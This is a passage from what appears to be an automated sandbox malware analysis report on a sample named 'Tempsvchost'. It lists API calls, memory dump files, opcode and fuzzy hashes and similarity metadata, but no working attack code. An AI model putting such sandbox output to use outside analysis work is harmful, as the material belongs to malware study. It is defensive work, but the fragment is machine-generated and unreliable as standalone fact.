                                                                                                                                                                                      • __set_app_type.MSVCRT ref: 004012EA
                                                                                                                                                                                        • Part of subcall function 004011B0: SetUnhandledExceptionFilter.KERNEL32(?,?,?,?,004012F5), ref: 004011E3
                                                                                                                                                                                        • Part of subcall function 004011B0: _setmode.MSVCRT ref: 00401220
                                                                                                                                                                                        • Part of subcall function 004011B0: _setmode.MSVCRT ref: 00401234
                                                                                                                                                                                        • Part of subcall function 004011B0: _setmode.MSVCRT ref: 00401248
                                                                                                                                                                                        • Part of subcall function 004011B0: __p__fmode.MSVCRT ref: 0040124D
                                                                                                                                                                                        • Part of subcall function 004011B0: __p__environ.MSVCRT ref: 00401267
                                                                                                                                                                                        • Part of subcall function 004011B0: _cexit.MSVCRT ref: 0040128A
                                                                                                                                                                                        • Part of subcall function 004011B0: ExitProcess.KERNEL32(?,?,?,?,?,004012F5), ref: 00401292
                                                                                                                                                                                      • __set_app_type.MSVCRT ref: 0040130A
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000011.00000002.418343076.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000011.00000002.418330554.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000011.00000002.418580864.00000000004BA000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000011.00000002.418795686.0000000000582000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000011.00000002.418808067.0000000000584000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000011.00000002.418818167.0000000000585000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000011.00000002.418868780.00000000005CA000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Tempsvchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _setmode$__set_app_type$ExceptionExitFilterProcessUnhandled__p__environ__p__fmode_cexit
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2461648636-0
                                                                                                                                                                                      • Opcode ID: 142f9094061640d7dfa25892014f10590445e25f429b9a5ce13c60e77ff3d03c
                                                                                                                                                                                      • Instruction ID: f80db6e2839ee1ef053660ae11d091960f31d3ae594b7abd80b0a25407298f34
                                                                                                                                                                                      • Opcode Fuzzy Hash: 142f9094061640d7dfa25892014f10590445e25f429b9a5ce13c60e77ff3d03c
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6FD04235414A268FC704BF68C809799FBB4BB04308F460A2CE5992B062D7B9355A8BE6
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 004014EF Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 12memoryCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000011.00000002.418343076.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000011.00000002.418330554.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000011.00000002.418580864.00000000004BA000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000011.00000002.418795686.0000000000582000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000011.00000002.418808067.0000000000584000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000011.00000002.418818167.0000000000585000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000011.00000002.418868780.00000000005CA000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Tempsvchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                                      • String ID: I
                                                                                                                                                                                      • API String ID: 4275171209-3707901625
                                                                                                                                                                                      • Opcode ID: 73088008719cf35d07a68ecfec43d486bf6a0ad11ec0d70a75c84333a9b1cfda
                                                                                                                                                                                      • Instruction ID: 9b7753275875457f266f99f27c6e44551eaa081eeb399219dbf1889746a32fe6
                                                                                                                                                                                      • Opcode Fuzzy Hash: 73088008719cf35d07a68ecfec43d486bf6a0ad11ec0d70a75c84333a9b1cfda
                                                                                                                                                                                      • Instruction Fuzzy Hash: C6D0C7B01083409BD3007F59D10531E7AE4574039CF80845DE5C417285D3BD944C8B97
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%